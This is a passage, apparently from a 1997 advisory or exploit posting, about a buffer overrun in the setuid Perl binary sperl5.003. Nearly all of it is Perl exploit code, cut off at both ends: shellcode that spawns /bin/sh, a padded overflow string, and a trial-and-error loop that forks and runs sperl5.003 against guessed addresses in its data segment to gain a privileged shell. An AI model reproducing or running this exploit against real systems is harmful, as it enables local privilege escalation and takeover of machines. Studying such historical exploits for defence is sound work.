1997 Nov 13
another buffer overrun in sperl5.003
...4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;
# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
$smash_me =
$shellcode . ('A' x (2052 - length($shellcode))) .
(pack("l", $address) x 1000) . ('B' x 1000);
$pid = fork();
if (!$pid) {
exec('/usr/bin/sperl5.003', $smash_me);
}
else {
wait;
if ($? == 0) {
prin...